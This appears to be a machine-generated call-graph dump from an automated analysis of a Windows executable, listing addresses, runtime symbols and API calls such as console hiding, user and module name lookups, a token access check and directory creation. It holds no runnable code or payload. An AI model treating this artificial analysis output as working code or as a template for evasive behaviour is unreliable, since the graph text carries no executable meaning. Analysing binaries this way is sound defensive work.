Concurrency::details::SchedulerBase::Statistics 94238->94247 94241 915045 94239->94241 94240 9150c1 94240->94238 94255 941427 29 API calls __onexit 94240->94255 94243 914a30 35 API calls 94241->94243 94246 91505d 94241->94246 94243->94246 94244 9150e5 94256 940f50 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94244->94256 94246->94247 94248 915077 CryptReleaseContext 94246->94248 94247->94122 94248->94247 94249->94130 94250->94132 94251->94228 94252->94230 94253->94232 94254->94240 94255->94244 94256->94238 94257->93306 94259 8dc95c GetConsoleWindow ShowWindow 94258->94259 94259->93312 94259->93325 94261 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94260->94261 94262 8c60d2 94261->94262 94262->93322 94264 8b8841 94263->94264 94265 8b8858 94264->94265 94266 8b88c3 94264->94266 94268 8e1fd0 collate 28 API calls 94265->94268 95554 965cc9 94266->95554 94277 8b8872 94268->94277 94269 8b88d5 94270 8b8908 94269->94270 94280 965cc9 28 API calls 94269->94280 95569 8e2110 94269->95569 95574 96550f 94270->95574 94271 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94273 8b88bf 94271->94273 94273->93333 94275 8b8978 94278 965942 messages 26 API calls 94275->94278 94276 8b889c Concurrency::details::SchedulerBase::Statistics 94276->94271 94277->94275 94277->94276 94279 8b897d 94278->94279 94280->94269 94282 8e1b7e 94281->94282 94284 8e1b5a 94281->94284 95867 8e8890 28 API calls SimpleUString::operator= 94282->95867 94286 8e1fd0 collate 28 API calls 94284->94286 94285 8e1b83 94287 8dcc65 94286->94287 94288 8e9850 94287->94288 94289 8e9860 94288->94289 95868 8ee970 94289->95868 94291 8dcc7b 94292 8e9d90 94291->94292 94293 8e2110 28 API calls 94292->94293 94294 8dcc91 94293->94294 94295 8e2290 94294->94295 94296 8e229b 94295->94296 94297 8e22b6 Concurrency::details::SchedulerBase::Statistics 94295->94297 94296->94297 94298 965942 messages 26 API calls 94296->94298 94297->93351 94299 8e22da 94298->94299 94301 8e1fd0 collate 28 API calls 94300->94301 94302 8c3081 94301->94302 94303 8e2410 _MREFOpen@16 28 API calls 94302->94303 94304 8c3097 94303->94304 95878 8c2380 94304->95878 94306 8c315f Concurrency::details::SchedulerBase::Statistics 94307 8e1fd0 collate 28 API calls 94306->94307 94310 8c318e 94307->94310 94308 8c3890 94312 965942 messages 26 API calls 94308->94312 94309 8c30a9 Concurrency::details::SchedulerBase::Statistics 94309->94306 94309->94308 94311 8e2410 _MREFOpen@16 28 API calls 94310->94311 94313 8c31a4 94311->94313 94314 8c38b3 94312->94314 94315 8c2380 30 API calls 94313->94315 94317 8c31b6 Concurrency::details::SchedulerBase::Statistics 94315->94317 94316 8e1fd0 collate 28 API calls 94318 8c329b 94316->94318 94317->94316 94319 8e2410 _MREFOpen@16 28 API calls 94318->94319 94320 8c32b1 94319->94320 94321 8c2380 30 API calls 94320->94321 94324 8c32c3 Concurrency::details::SchedulerBase::Statistics 94321->94324 94322 8eace0 28 API calls 94323 8c33b5 94322->94323 94325 8e1fd0 collate 28 API calls 94323->94325 94324->94322 94326 8c33e1 94325->94326 94327 8e2410 _MREFOpen@16 28 API calls 94326->94327 94328 8c33f3 94327->94328 94329 8c2380 30 API calls 94328->94329 94331 8c3402 Concurrency::details::SchedulerBase::Statistics 94329->94331 94330 8eadc0 28 API calls 94332 8c34d3 94330->94332 94331->94330 95954 8e7430 94332->95954 94334 8c34f0 94335 8eace0 28 API calls 94334->94335 94336 8c3522 94335->94336 94337 8e1fd0 collate 28 API calls 94336->94337 94338 8c354b 94337->94338 94339 8e2410 _MREFOpen@16 28 API calls 94338->94339 94340 8c355d 94339->94340 94341 8c2380 30 API calls 94340->94341 94344 8c356c Concurrency::details::SchedulerBase::Statistics 94341->94344 94342 8eadc0 28 API calls 94343 8c363d 94342->94343 94345 8e7430 SimpleUString::operator= 28 API calls 94343->94345 94344->94342 94346 8c365a 94345->94346 94347 8e1fd0 collate 28 API calls 94346->94347 94348 8c367f 94347->94348 94349 8e2410 _MREFOpen@16 28 API calls 94348->94349 94350 8c3692 94349->94350 94351 8c2380 30 API calls 94350->94351 94352 8c36a1 Concurrency::details::SchedulerBase::Statistics 94351->94352 94353 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94352->94353 94354 8c388c GetModuleFileNameW 94353->94354 94355 8e1a30 94354->94355 94356 8e1a52 94355->94356 94356->94356 94357 8e7430 SimpleUString::operator= 28 API calls 94356->94357 94358 8dcd0b 94357->94358 94359 8c3eb0 GetUserNameW 94358->94359 94360 8c3f20 94359->94360 94361 8e7430 SimpleUString::operator= 28 API calls 94360->94361 94362 8c3f42 94361->94362 94363 8e7430 SimpleUString::operator= 28 API calls 94362->94363 94364 8c3f6e 94363->94364 94365 8eace0 28 API calls 94364->94365 94366 8c3fa6 94365->94366 94367 8e1fd0 collate 28 API calls 94366->94367 94369 8c3fcf Concurrency::details::SchedulerBase::Statistics 94367->94369 94368 8c4052 Concurrency::details::SchedulerBase::Statistics 94371 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94368->94371 94369->94368 94370 8c4075 94369->94370 94373 965942 messages 26 API calls 94370->94373 94372 8c4071 94371->94372 94375 8c3d50 GetSystemDirectoryW 94372->94375 94374 8c407a 94373->94374 94376 8c3dd0 94375->94376 94377 8e7430 SimpleUString::operator= 28 API calls 94376->94377 94378 8c3dee 94377->94378 94379 8e7430 SimpleUString::operator= 28 API calls 94378->94379 94380 8c3e3f 94379->94380 94381 8e19a0 26 API calls 94380->94381 94382 8c3e4d 94381->94382 94383 8c3e7f Concurrency::details::SchedulerBase::Statistics 94382->94383 94385 8c3ea5 94382->94385 94384 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94383->94384 94386 8c3ea1 94384->94386 94387 965942 messages 26 API calls 94385->94387 94389 8e19a0 94386->94389 94388 8c3eaa 94387->94388 94390 8e19ae 94389->94390 94391 8e19d7 Concurrency::details::SchedulerBase::Statistics 94389->94391 94390->94391 94392 965942 messages 26 API calls 94390->94392 94391->93346 94393 8e1a20 94392->94393 94395 8b49cb 94394->94395 94396 8b49ec Concurrency::details::SchedulerBase::Statistics 94394->94396 94395->94396 94397 965942 messages 26 API calls 94395->94397 94396->93350 94398 8b4a12 94397->94398 96110 93d370 94398->96110 94402 8ea3b0 94401->94402 94402->94402 96138 8e16e0 94402->96138 94404 8ea3cf 96147 8e88e0 94404->96147 94406 8ea3e1 94407 8e88e0 28 API calls 94406->94407 94408 8dcd4a 94407->94408 94409 8ea420 94408->94409 94410 8ea435 94409->94410 94411 8e88e0 28 API calls 94410->94411 94412 8dcd60 94411->94412 94413 8ea2e0 94412->94413 94414 8ea2f1 94413->94414 94414->94414 94415 8e88e0 28 API calls 94414->94415 94416 8dcd76 94415->94416 94416->93363 94418 8e1c10 _MREFOpen@16 28 API calls 94417->94418 94420 8ead2d 94418->94420 94419 8dce65 94422 8e9750 94419->94422 94420->94419 96160 8ec270 94420->96160 94423 8e97b0 94422->94423 94423->94423 94424 8e1c10 _MREFOpen@16 28 API calls 94423->94424 94425 8e97c9 94424->94425 94426 8e2110 28 API calls 94425->94426 94427 8e97d1 94426->94427 94430 8e97ec SimpleUString::operator= 94427->94430 96174 8ec3b0 28 API calls 5 library calls 94427->96174 94429 8e9832 94429->93385 94430->93385 94432 8d45f4 GetLastError 94431->94432 94433 8d4620 DuplicateToken 94431->94433 94434 8d475a 94432->94434 94435 8d4605 GetCurrentProcess OpenProcessToken 94432->94435 94433->94434 94436 8d4637 AllocateAndInitializeSid 94433->94436 94439 8d476c 94434->94439 94440 8d4769 LocalFree 94434->94440 94435->94433 94435->94434 94436->94434 94437 8d4662 LocalAlloc 94436->94437 94437->94434 94438 8d4677 InitializeSecurityDescriptor 94437->94438 94438->94434 94443 8d4688 GetLengthSid LocalAlloc 94438->94443 94441 8d4776 94439->94441 94442 8d4773 LocalFree 94439->94442 94440->94439 94444 8d477d FreeSid 94441->94444 94445 8d4784 94441->94445 94442->94441 94443->94434 94446 8d46a8 InitializeAcl 94443->94446 94444->94445 94447 8d4794 94445->94447 94448 8d4791 CloseHandle 94445->94448 94446->94434 94449 8d46ba AddAccessAllowedAce 94446->94449 94450 8d479e 94447->94450 94451 8d479b CloseHandle 94447->94451 94448->94447 94449->94434 94452 8d46d2 SetSecurityDescriptorDacl 94449->94452 94453 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94450->94453 94451->94450 94452->94434 94454 8d46e6 SetSecurityDescriptorGroup SetSecurityDescriptorOwner IsValidSecurityDescriptor 94452->94454 94455 8d47ac 94453->94455 94454->94434 94456 8d470f AccessCheck 94454->94456 94455->93418 94456->94434 94457 8d4751 94456->94457 94457->94434 94459 8e1ac6 94458->94459 94460 8e1acd 94459->94460 94461 8e7d20 SimpleUString::operator= 28 API calls 94459->94461 94460->93421 94462 8e1b01 _LStrxfrm 94461->94462 94462->93421 94464 8ea350 28 API calls 94463->94464 94465 8c3911 94464->94465 94466 8e7430 SimpleUString::operator= 28 API calls 94465->94466 94467 8c395e 94466->94467 94468 8e88e0 28 API calls 94467->94468 94469 8c3983 94468->94469 94470 8e88e0 28 API calls 94469->94470 94472 8c39c8 Concurrency::details::SchedulerBase::Statistics 94470->94472 94471 8c3a83 Concurrency::details::SchedulerBase::Statistics 94475 8e7430 SimpleUString::operator= 28 API calls 94471->94475 94472->94471 94473 8c3d38 94472->94473 94474 965942 messages 26 API calls 94473->94474 94476 8c3d3d 94474->94476 94477 8c3aec 94475->94477 94478 965942 messages 26 API calls 94476->94478 94480 8e88e0 28 API calls 94477->94480 94479 8c3d42 94478->94479 94481 965942 messages 26 API calls 94479->94481 94482 8c3b02 94480->94482 94484 8c3d47 94481->94484 94482->94476 94483 8c3b66 GetFileAttributesW 94482->94483 94485 8c3b5c Concurrency::details::SchedulerBase::Statistics 94482->94485 94486 8c3bc0 GetFileAttributesW 94483->94486 94487 8c3b82 CreateDirectoryW 94483->94487 94485->94483 94490 8c3bcc CreateDirectoryW 94486->94490 94491 8c3c01 Concurrency::details::SchedulerBase::Statistics 94486->94491 94488 8c3b9c CreateDirectoryW 94487->94488 94489 8c3b95 CreateDirectoryW 94487->94489 94492 8c3bb6 CreateDirectoryW 94488->94492 94493 8c3ba3 CreateDirectoryW CreateDirectoryW CreateDirectoryW 94488->94493 94489->94488 94494 8c3bd9 CreateDirectoryW CreateDirectoryW 94490->94494 94495 8c3bea 94490->94495 94491->94479 94498 8c3d13 Concurrency::details::SchedulerBase::Statistics 94491->94498 94492->94491 94493->94491 94496 8c3bf0 GetFileAttributesW 94494->94496 94495->94496 94496->94491 94497 8c3bfc CreateDirectoryW 94496->94497 94497->94491 94499 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94498->94499 94500 8c3d34 94499->94500 94500->93426 94502 8e7430 SimpleUString::operator= 28 API calls 94501->94502 94503 8b936f 94502->94503 94504 8e7430 SimpleUString::operator= 28 API calls 94503->94504 94505 8b9395 94504->94505 94506 8b93b1 94505->94506 94507 8e7430 SimpleUString::operator= 28 API calls 94505->94507 94508 8e1aa0 28 API calls 94506->94508 94507->94506 94509 8b93bd 94508->94509 94510 8e1aa0 28 API calls 94509->94510 94511 8b93d0 94510->94511 96175 8ebfa0 94511->96175 94513 8ea350 28 API calls 94514 8b9560 94513->94514 94516 8e88e0 28 API calls 94514->94516 94515 8b93f8 SimpleUString::operator= 94517 8baca8 94515->94517 94518 8b9441 SimpleUString::operator= 94515->94518 94532 8b9541 Concurrency::details::SchedulerBase::Statistics 94515->94532 94520 8b957d 94516->94520 96291 8e8890 28 API calls SimpleUString::operator= 94517->96291 94523 8ea350 28 API calls 94518->94523 94522 8e88e0 28 API calls 94520->94522 94521 8bacad 94524 965942 messages 26 API calls 94521->94524 94528 8b95d1 Concurrency::details::SchedulerBase::Statistics 94522->94528 94530 8b9495 Concurrency::details::SchedulerBase::Statistics 94523->94530 94525 8bacb2 94524->94525 94526 965942 messages 26 API calls 94525->94526 94527 8bacb7 94526->94527 96292 8e8890 28 API calls SimpleUString::operator= 94527->96292 94528->94525 94541 8b96aa Concurrency::details::QuickBitSet::QuickBitSet Concurrency::details::SchedulerBase::Statistics 94528->94541 94529 8e7430 SimpleUString::operator= 28 API calls 94533 8b9ac7 94529->94533 94530->94521 94530->94532 94532->94513 94535 8b9b11 94533->94535 94537 8e7430 SimpleUString::operator= 28 API calls 94533->94537 94534 8bacbc 94536 965942 messages 26 API calls 94534->94536 96191 8ea5f0 94535->96191 94539 8bacc1 94536->94539 94540 8b9b02 94537->94540 94543 965942 messages 26 API calls 94539->94543 94544 8e7430 SimpleUString::operator= 28 API calls 94540->94544 94545 8e4310 132 API calls 94541->94545 94570 8b9a5c std::ios_base::_Ios_base_dtor 94541->94570 94547 8bacc6 94543->94547 94544->94535 94576 8b972e 94545->94576 94549 965942 messages 26 API calls 94547->94549 94550 8baccb 94549->94550 94552 965942 messages 26 API calls 94550->94552 94551 8b99c2 96266 8e8210 94551->96266 94566 8b997b 94566->94539 94574 8b99a9 Concurrency::details::SchedulerBase::Statistics 94566->94574 94570->94529 94574->94551 96247 8e8140 94574->96247 94576->94574 94577 8b986a 94576->94577 96245 8e7160 28 API calls 4 library calls 94576->96245 94577->94527 94577->94566 94580 8b9901 94577->94580 94581 8e7430 SimpleUString::operator= 28 API calls 94580->94581 94583 8b9927 94581->94583 96246 96251c 22 API calls __dosmaperr 94583->96246 94588 8b9938 94588->94534 94813 8c6588 94812->94813 94814 8c6604 94812->94814 94813->94814 94815 8c6590 94813->94815 94816 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94814->94816 94817 8c65f0 94815->94817 94820 8c659c 94815->94820 94818 8c6614 94816->94818 94819 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94817->94819 94818->93425 94821 8c6600 94819->94821 94822 8c65dc 94820->94822 94824 8c65a8 94820->94824 94821->93425 94823 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94822->94823 94825 8c65ec 94823->94825 94826 8c65c8 94824->94826 94828 8c65b4 94824->94828 94825->93425 94827 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94826->94827 94829 8c65d8 94827->94829 94830 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94828->94830 94829->93425 94831 8c65c4 94830->94831 94831->93425 94833 8e226d 94832->94833 94834 8dd10b 94832->94834 94835 8e1fd0 collate 28 API calls 94833->94835 94836 8b8ae0 94834->94836 94835->94834 94837 8b8b37 94836->94837 94840 8b8b4c 94836->94840 96711 9297d0 64 API calls 94837->96711 94839 8e16e0 28 API calls 94847 8b8be7 94839->94847 94840->94839 94841 8b8c94 94842 8b8cec 94841->94842 96713 961d48 71 API calls 94841->96713 94843 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 94842->94843 94844 8b8d07 94843->94844 94844->93444 94847->94841 96712 8e7160 28 API calls 4 library calls 94847->96712 96714 8ee7b0 94848->96714 94850 8dd18e 94850->93454 95506->93320 95556 965c04 ___scrt_is_nonwritable_in_current_image 95554->95556 95555 965c1c 95558 9661c3 __Wcrtomb 20 API calls 95555->95558 95556->95555 95557 965c48 95556->95557 95563 965c2c std::_Xfsopen 95557->95563 95605 96230d EnterCriticalSection 95557->95605 95559 965c21 95558->95559 95621 965932 26 API calls messages 95559->95621 95562 965c5b 95606 964b05 95562->95606 95563->94269 95565 965c8e 95622 965cbf LeaveCriticalSection std::_Xfsopen 95565->95622 95568 965c67 95568->95565 95614 96562a 95568->95614 95570 8e2120 95569->95570 95573 8e2137 SimpleUString::operator= 95570->95573 95625 8ec3b0 28 API calls 5 library calls 95570->95625 95572 8e2172 95572->94269 95573->94269 95575 96551b ___scrt_is_nonwritable_in_current_image 95574->95575 95576 965541 95575->95576 95577 965529 95575->95577 95626 96ca1b EnterCriticalSection 95576->95626 95578 9661c3 __Wcrtomb 20 API calls 95577->95578 95580 96552e 95578->95580 95662 965932 26 API calls messages 95580->95662 95581 96554e 95627 96549c 95581->95627 95585 965560 95588 9661c3 __Wcrtomb 20 API calls 95585->95588 95586 96556d 95633 9625ba 95586->95633 95591 965565 95588->95591 95589 965573 95592 9661c3 __Wcrtomb 20 API calls 95589->95592 95590 965539 std::_Xfsopen 95590->94277 95663 9655da LeaveCriticalSection std::_Lockit::~_Lockit 95591->95663 95594 965582 95592->95594 95595 9661c3 __Wcrtomb 20 API calls 95594->95595 95596 965589 95595->95596 95646 977451 95596->95646 95599 9655b6 95601 9661c3 __Wcrtomb 20 API calls 95599->95601 95600 9661c3 __Wcrtomb 20 API calls 95602 9655a8 95600->95602 95601->95591 95602->95599 95603 9655ad 95602->95603 95604 9661c3 __Wcrtomb 20 API calls 95603->95604 95604->95591 95605->95562 95607 964b7e 95606->95607 95608 964b18 95606->95608 95607->95568 95609 973ea4 __fread_nolock 26 API calls 95608->95609 95610 964b1e 95609->95610 95610->95607 95611 9661c3 __Wcrtomb 20 API calls 95610->95611 95612 964b73 95611->95612 95623 965932 26 API calls messages 95612->95623 95615 9655ee 95614->95615 95616 9661c3 __Wcrtomb 20 API calls 95615->95616 95618 96560f __fread_nolock 95615->95618 95617 9655ff 95616->95617 95624 965932 26 API calls messages 95617->95624 95618->95568 95620 96560a 95620->95568 95621->95563 95622->95563 95623->95607 95624->95620 95625->95572 95626->95581 95629 9654bb 95627->95629 95628 9654ca 95628->95585 95628->95586 95629->95628 95664 977065 29 API calls 3 library calls 95629->95664 95631 9654e5 95632 975565 _free 20 API calls 95631->95632 95632->95628 95634 9625c6 ___scrt_is_nonwritable_in_current_image 95633->95634 95635 9625d7 95634->95635 95636 9625ec 95634->95636 95637 9661c3 __Wcrtomb 20 API calls 95635->95637 95645 9625e7 std::_Xfsopen 95636->95645 95665 96230d EnterCriticalSection 95636->95665 95639 9625dc 95637->95639 95682 965932 26 API calls messages 95639->95682 95640 962608 95666 962544 95640->95666 95643 962613 95683 962630 LeaveCriticalSection std::_Xfsopen 95643->95683 95645->95589 95647 977464 95646->95647 95648 9774db 95647->95648 95649 977472 WaitForSingleObject 95647->95649 95650 9661c3 __Wcrtomb 20 API calls 95648->95650 95651 97747e GetExitCodeProcess 95649->95651 95652 97749a GetLastError 95649->95652 95659 96559c 95650->95659 95651->95652 95653 97748d 95651->95653 95654 9774a5 95652->95654 95655 9774bd 95652->95655 95653->95659 95660 9774d0 CloseHandle 95653->95660 95656 9661c3 __Wcrtomb 20 API calls 95654->95656 95866 96618d 20 API calls 3 library calls 95655->95866 95658 9774aa 95656->95658 95661 9661b0 __dosmaperr 20 API calls 95658->95661 95659->95599 95659->95600 95660->95659 95661->95653 95662->95590 95663->95590 95664->95631 95665->95640 95667 962566 95666->95667 95668 962551 95666->95668 95673 962561 std::_Xfsopen 95667->95673 95684 962335 95667->95684 95669 9661c3 __Wcrtomb 20 API calls 95668->95669 95670 962556 95669->95670 95709 965932 26 API calls messages 95670->95709 95673->95643 95677 973ea4 __fread_nolock 26 API calls 95678 962588 95677->95678 95694 9760dd 95678->95694 95681 975565 _free 20 API calls 95681->95673 95682->95645 95683->95645 95685 96234d 95684->95685 95686 962349 95684->95686 95685->95686 95687 973ea4 __fread_nolock 26 API calls 95685->95687 95690 97563f 95686->95690 95688 96236d 95687->95688 95710 975d3c 95688->95710 95691 975655 95690->95691 95692 962582 95690->95692 95691->95692 95693 975565 _free 20 API calls 95691->95693 95692->95677 95693->95692 95695 976101 95694->95695 95696 9760ec 95694->95696 95697 97613c 95695->95697 95702 976128 95695->95702 95698 9661b0 __dosmaperr 20 API calls 95696->95698 95699 9661b0 __dosmaperr 20 API calls 95697->95699 95700 9760f1 95698->95700 95703 976141 95699->95703 95701 9661c3 __Wcrtomb 20 API calls 95700->95701 95706 96258e 95701->95706 95832 9760b5 95702->95832 95705 9661c3 __Wcrtomb 20 API calls 95703->95705 95707 976149 95705->95707 95706->95673 95706->95681 95835 965932 26 API calls messages 95707->95835 95709->95673 95711 975d48 ___scrt_is_nonwritable_in_current_image 95710->95711 95712 975d50 95711->95712 95717 975d68 95711->95717 95713 9661b0 __dosmaperr 20 API calls 95712->95713 95715 975d55 95713->95715 95714 975e06 95716 9661b0 __dosmaperr 20 API calls 95714->95716 95720 9661c3 __Wcrtomb 20 API calls 95715->95720 95718 975e0b 95716->95718 95717->95714 95719 975d9d 95717->95719 95721 9661c3 __Wcrtomb 20 API calls 95718->95721 95735 97d3a4 EnterCriticalSection 95719->95735 95729 975d5d std::_Xfsopen 95720->95729 95723 975e13 95721->95723 95790 965932 26 API calls messages 95723->95790 95724 975da3 95726 975dd4 95724->95726 95727 975dbf 95724->95727 95736 975e27 95726->95736 95728 9661c3 __Wcrtomb 20 API calls 95727->95728 95731 975dc4 95728->95731 95729->95686 95733 9661b0 __dosmaperr 20 API calls 95731->95733 95732 975dcf 95789 975dfe LeaveCriticalSection __wsopen_s 95732->95789 95733->95732 95735->95724 95737 975e55 95736->95737 95774 975e4e 95736->95774 95738 975e59 95737->95738 95739 975e78 95737->95739 95741 9661b0 __dosmaperr 20 API calls 95738->95741 95742 975eac 95739->95742 95743 975ec9 95739->95743 95740 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 95744 97602f 95740->95744 95745 975e5e 95741->95745 95748 9661b0 __dosmaperr 20 API calls 95742->95748 95746 975edf 95743->95746 95749 9797f5 __wsopen_s 28 API calls 95743->95749 95744->95732 95747 9661c3 __Wcrtomb 20 API calls 95745->95747 95791 9759cc 95746->95791 95750 975e65 95747->95750 95752 975eb1 95748->95752 95749->95746 95805 965932 26 API calls messages 95750->95805 95755 9661c3 __Wcrtomb 20 API calls 95752->95755 95758 975eb9 95755->95758 95756 975f26 95759 975f80 WriteFile 95756->95759 95760 975f3a 95756->95760 95757 975eed 95761 975f13 95757->95761 95762 975ef1 95757->95762 95806 965932 26 API calls messages 95758->95806 95767 975fa3 GetLastError 95759->95767 95773 975f09 95759->95773 95764 975f42 95760->95764 95765 975f70 95760->95765 95808 9757ac 71 API calls 3 library calls 95761->95808 95766 975fe7 95762->95766 95807 97595f GetLastError WriteConsoleW CreateFileW __wsopen_s 95762->95807 95769 975f47 95764->95769 95770 975f60 95764->95770 95798 975a42 95765->95798 95766->95774 95777 9661c3 __Wcrtomb 20 API calls 95766->95777 95767->95773 95769->95766 95775 975f50 95769->95775 95810 975c0f 8 API calls 2 library calls 95770->95810 95773->95766 95773->95774 95778 975fc3 95773->95778 95774->95740 95809 975b21 7 API calls 2 library calls 95775->95809 95779 97600c 95777->95779 95783 975fde 95778->95783 95784 975fca 95778->95784 95782 9661b0 __dosmaperr 20 API calls 95779->95782 95781 975f5e 95781->95773 95782->95774 95811 96618d 20 API calls 3 library calls 95783->95811 95785 9661c3 __Wcrtomb 20 API calls 95784->95785 95787 975fcf 95785->95787 95788 9661b0 __dosmaperr 20 API calls 95787->95788 95788->95774 95789->95729 95790->95729 95792 980447 __fread_nolock 26 API calls 95791->95792 95793 9759dc 95792->95793 95794 9759e1 95793->95794 95812 974b79 GetLastError 95793->95812 95794->95756 95794->95757 95796 975a04 95796->95794 95797 975a22 GetConsoleMode 95796->95797 95797->95794 95800 975a51 __wsopen_s 95798->95800 95799 975b04 95801 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 95799->95801 95800->95799 95802 975ac3 WriteFile 95800->95802 95804 975b1d 95801->95804 95802->95800 95803 975b06 GetLastError 95802->95803 95803->95799 95804->95773 95805->95774 95806->95774 95807->95773 95808->95773 95809->95781 95810->95781 95811->95774 95813 974b8f 95812->95813 95814 974b95 95812->95814 95816 9737e8 __Getcvt 11 API calls 95813->95816 95815 975508 std::_Locinfo::_Locinfo_ctor 20 API calls 95814->95815 95819 974be4 SetLastError 95814->95819 95817 974ba7 95815->95817 95816->95814 95818 974baf 95817->95818 95820 97383e __Getcvt 11 API calls 95817->95820 95821 975565 _free 20 API calls 95818->95821 95819->95796 95822 974bc4 95820->95822 95823 974bb5 95821->95823 95822->95818 95824 974bcb 95822->95824 95825 974bf0 SetLastError 95823->95825 95826 9749eb __Getcvt 20 API calls 95824->95826 95827 96d289 _abort 61 API calls 95825->95827 95828 974bd6 95826->95828 95829 974bfc 95827->95829 95830 975565 _free 20 API calls 95828->95830 95831 974bdd 95830->95831 95831->95819 95831->95825 95836 976033 95832->95836 95834 9760d9 95834->95706 95835->95706 95837 97603f ___scrt_is_nonwritable_in_current_image 95836->95837 95847 97d3a4 EnterCriticalSection 95837->95847 95839 97604d 95840 976074 95839->95840 95841 97607f 95839->95841 95848 97615c 95840->95848 95843 9661c3 __Wcrtomb 20 API calls 95841->95843 95844 97607a 95843->95844 95863 9760a9 LeaveCriticalSection __wsopen_s 95844->95863 95846 97609c std::_Xfsopen 95846->95834 95847->95839 95849 97d621 __wsopen_s 26 API calls 95848->95849 95851 97616c 95849->95851 95850 976172 95864 97d590 21 API calls 3 library calls 95850->95864 95851->95850 95853 9761a4 95851->95853 95855 97d621 __wsopen_s 26 API calls 95851->95855 95853->95850 95856 97d621 __wsopen_s 26 API calls 95853->95856 95854 9761ca 95857 9761ec 95854->95857 95865 96618d 20 API calls 3 library calls 95854->95865 95858 97619b 95855->95858 95859 9761b0 CloseHandle 95856->95859 95857->95844 95861 97d621 __wsopen_s 26 API calls 95858->95861 95859->95850 95862 9761bc GetLastError 95859->95862 95861->95853 95862->95850 95863->95846 95864->95854 95865->95857 95866->95653 95867->94285 95869 8ee986 95868->95869 95870 8eea37 95868->95870 95875 8ee998 SimpleUString::operator= _LStrxfrm 95869->95875 95876 8effd0 28 API calls 5 library calls 95869->95876 95877 8e8890 28 API calls SimpleUString::operator= 95870->95877 95873 8eea3c 95874 8eea30 95874->94291 95875->94291 95876->95874 95877->95873 95879 8e2410 _MREFOpen@16 28 API calls 95878->95879 95880 8c23db 95879->95880 95881 8b7fe0 28 API calls 95880->95881 95882 8c244f 95881->95882 95964 8e1c10 95882->95964 95884 8c249f 95886 8c24c7 SimpleUString::operator= 95884->95886 96015 8ec3b0 28 API calls 5 library calls 95884->96015 95887 8e2110 28 API calls 95886->95887 95889 8c2524 Concurrency::details::QuickBitSet::QuickBitSet Concurrency::details::SchedulerBase::Statistics 95887->95889 95888 8c2f22 95891 965942 messages 26 API calls 95888->95891 95889->95888 95976 8c2f40 95889->95976 95893 8c2f27 95891->95893 95894 965942 messages 26 API calls 95893->95894 95896 8c2f2c 95894->95896 95898 965942 messages 26 API calls 95896->95898 95897 8c25b0 Concurrency::details::QuickBitSet::QuickBitSet 95900 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 95897->95900 95899 8c2f31 95898->95899 96017 8e8890 28 API calls SimpleUString::operator= 95899->96017 95902 8c25ca 95900->95902 95904 8f4f60 28 API calls 95902->95904 95903 8c2f36 95905 8c25e8 95904->95905 95986 8fbf30 95905->95986 95907 8c261b Concurrency::details::QuickBitSet::QuickBitSet 95908 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 95907->95908 95909 8c2636 95908->95909 95910 8f4f60 28 API calls 95909->95910 95911 8c265b 95910->95911 95912 8b76c0 30 API calls 95911->95912 95913 8c268d 95912->95913 95914 8e1fd0 collate 28 API calls 95913->95914 95915 8c26a0 95914->95915 95916 8b7fe0 28 API calls 95915->95916 95917 8c26b1 Concurrency::details::SchedulerBase::Statistics 95916->95917 95917->95893 95918 8c2d88 95917->95918 95919 8c2786 95917->95919 95920 8e1fd0 collate 28 API calls 95918->95920 95919->95899 95921 8b7fe0 28 API calls 95919->95921 95953 8c2a49 Concurrency::details::SchedulerBase::Statistics 95920->95953 95922 8c27ae 95921->95922 95923 8e1c10 _MREFOpen@16 28 API calls 95922->95923 95924 8c2804 95923->95924 95926 8c282c SimpleUString::operator= 95924->95926 96016 8ec3b0 28 API calls 5 library calls 95924->96016 95927 8e2110 28 API calls 95926->95927 95931 8c2889 Concurrency::details::QuickBitSet::QuickBitSet Concurrency::details::SchedulerBase::Statistics 95927->95931 95928 8c2f1d 95929 965942 messages 26 API calls 95928->95929 95929->95888 95930 8c2cff Concurrency::details::SchedulerBase::Statistics 95932 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 95930->95932 95931->95896 95933 8c2f40 30 API calls 95931->95933 95934 8c2d22 95932->95934 95935 8c28fa 95933->95935 95934->94309 95936 8f7340 30 API calls 95935->95936 95937 8c2915 Concurrency::details::QuickBitSet::QuickBitSet 95936->95937 95938 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 95937->95938 95939 8c292f 95938->95939 95940 8f4f60 28 API calls 95939->95940 95941 8c294d 95940->95941 95942 8fbf30 30 API calls 95941->95942 95943 8c2980 Concurrency::details::QuickBitSet::QuickBitSet 95942->95943 95944 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 95943->95944 95945 8c299b 95944->95945 95946 8f4f60 28 API calls 95945->95946 95947 8c29c0 95946->95947 95948 8b76c0 30 API calls 95947->95948 95949 8c29f2 95948->95949 95950 8b7fe0 28 API calls 95949->95950 95951 8c2a07 95950->95951 95952 8e1fd0 collate 28 API calls 95951->95952 95951->95953 95952->95953 95953->95899 95953->95928 95953->95930 95956 8e7480 95954->95956 95958 8e744e SimpleUString::operator= 